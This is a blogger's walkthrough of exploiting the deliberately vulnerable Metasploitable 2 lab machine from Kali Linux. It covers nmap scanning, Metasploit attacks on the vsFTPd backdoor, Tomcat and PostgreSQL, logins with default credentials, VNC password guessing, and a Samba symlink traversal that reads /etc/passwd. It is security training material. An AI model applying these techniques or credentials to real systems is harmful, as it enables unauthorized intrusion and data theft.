# EXPLOITING METASPLOITABLE 2
Metasploitable 2 is an intentionally vulnerable Ubuntu Linux virtual machine designed for security training and penetration testing practice. In this walkthrough, I will methodically exploit its weaknesses, demonstrating a common penetration testing lifecycle: Reconnaissance, Enumeration and Exploitation. My attacking platform will be Kali Linux. By the end of this guide, you will have a clear understanding of how multiple vulnerabilities can be chained together to gain full control of a system.
## Lab Environment Setup
Before we begin, ensure your lab environment is configured correctly. The Metasploitable 2 VM (192.168.40.135 in my lab) and the Kali Linux VM are connected on the same isolated network segment (NAT). This isolation is critical for safe and ethical testing.
After opening my metasploitable 2 using vmware and using the given credentials to login, i tried to check for it's IP address as seen below;
## Reconnaissance
My first step is to discover the target and map its attack surface. I begun with a simple ping sweep to confirm connectivity.
To build a complete profile of the target, I executed an aggressive nmap scan using the -sC -sV -Pn arguments.
-sV: Conducts service version detection, a critical step for fingerprinting software and identifying potential vulnerabilities.
-sC: Executes a collection of default NSE (Nmap Scripting Engine) scripts to automate common checks and discover additional information.
-Pn: Skips host discovery (the ping sweep), treating all specified hosts as online. This is a useful tactic for bypassing basic firewalls that block ICMP requests
The comprehensive Nmap scan reveals a critically vulnerable system with a massively expanded attack surface. The host is running a staggering number of outdated and insecure services, many of which contain well-documented, high-severity vulnerabilities.
#### Key findings include:
**Multiple Critical Entry Points**: The scan identified numerous high-priority targets, including:
`vsFTPd 2.3.4` on port 21, which contains a famous backdoor command execution vulnerability.
`A root-level bind shell service` (rootshell) listening directly on port 1524.
`UnrealIRCd 3.2.8.1` on port 6667, known for a remote code execution backdoor.
`Outdated and vulnerable versions of Samba` (3.0.20) on ports 139/445, OpenSSH, and Apache Tomcat (5.5) on port 8180.
**Poor Security Posture**: The host configuration demonstrates a complete lack of security hardening. Services like telnet (port 23), rsh (ports 512,513,514), and FTP allow unencrypted credentials transmission, and anonymous logins are permitted on several services.
**Information Leakage**: The system readily discloses excessive information, such as software versions, user accounts (via rusers and finger), and even internal hostnames (irc.Metasploitable.LAN), which greatly aids an attacker in crafting targeted exploits.
## Exploitation
### FTP Backdoor
The sheer number of vulnerabilities in our scan results provides multiple avenues for initial access. For this demonstration, I will exploit one of the most critical and well-known flaws: the malicious backdoor deliberately planted in vsFTPd version 2.3.4. To do this efficiently, I will leverage the Metasploit Framework.
Metasploit's power lies in its modular database of exploits, payloads, and auxiliary tools. I begin by searching its integrated database for a module related to my target service as seen above.
The search confirms the presence of a dedicated exploit module. I then load this module and examine its configuration requirements.
The only mandatory parameter is RHOSTS, underscoring how this backdoor provides a direct and unauthenticated path to command execution.
With the target set, I execute the module to trigger the backdoor as seen above.
The attack has triggered the hidden backdoor in the FTP service, granting me immediate, interactive command-line access to the target system. Critically, the exploit has landed me in a session with root privileges, bypassing any need for privilege escalation. This provides me with absolute control over the system from the outset, demonstrating the catastrophic impact of a single unpatched service.
### Gaining Access via Default Telnet Credentials
This action demonstrates logging into the Metasploitable 2 machine using a default account via the insecure Telnet protocol. I successfully authenticated with the easily guessable credentials "msfadmin" and "msfadmin," gaining unprivileged command-line access. Once inside,I used basic reconnaissance commands to explore the user's home directory.
### Gaining Graphical Access with a VNC Password Crack
First, I used Metasploit to check if the VNC service on the target has a weak password. The scanner found that the password for VNC was simply 'password'.
To connect to the target's graphical desktop, I needed a VNC viewer tool. So I installed a common one called xtightvncviewer on my Kali machine.
Using the viewer and the password we found, I connected to the target's VNC server. This granted me full graphical control of the Metasploitable 2 desktop, logged in as the root user.
### Exploiting PostgreSQL with a Default Password
I searched within Metasploit for any modules related to 'postgresql' to find a way to attack this database service.
From the list of results, I selected an exploit specifically designed for Linux systems that uses the PostgreSQL database to run malicious code.
I configured the exploit to target our Metasploitable machine. The key settings used the target's IP and the default PostgreSQL username and password (postgres:postgres), which we guessed correctly.
### Exploiting Apache Tomcat Manager
I searched Metasploit for an exploit targeting the old version of Apache Tomcat that I found in my scan.
I found an exploit that uploads a malicious file. I configured it with the target's IP, the correct port (8180), and the default username and password (tomcat:tomcat). When I ran the exploit, it successfully gave me a remote connection.
The attack worked! I gained a meterpreter session on the target. I ran basic commands to list the main directory, proving we had full access to the machine's file system.
### Stealing Password Files via Samba
First, I scanned the target for Samba file shares. I connected anonymously (no password) and found a share called tmp.
I used Metasploit tool to exploit a Samba vulnerability.I then used an exploit called Samba Symlink Directory Traversal that tricks the Samba file-sharing service into giving us access to folders it's not supposed to.
I configured the tool to use the tmp share. The exploit created a special link named rootfs that points to the server's main hard drive (/)
I connected to the tmp share again. Now I could see the rootfs folder. By entering it, I could browse the entire file system of the target server, including the sensitive /etc directory.
I used the more command to view and download the server's passwd file, which contains a list of all user accounts on the system.
## Conclusion
This walkthrough showed how easy it is to hack a poorly secured system. Using simple tools, we found outdated software and weak passwords, then used them to get full control. It proves that keeping software updated, removing unused services, and using strong passwords is essential for security. Metasploitable is a powerful reminder of what happens when these basic steps are ignored.
Thank you for reading this.
Regards,dr3amy!
Sign in with Wallet
Connect another wallet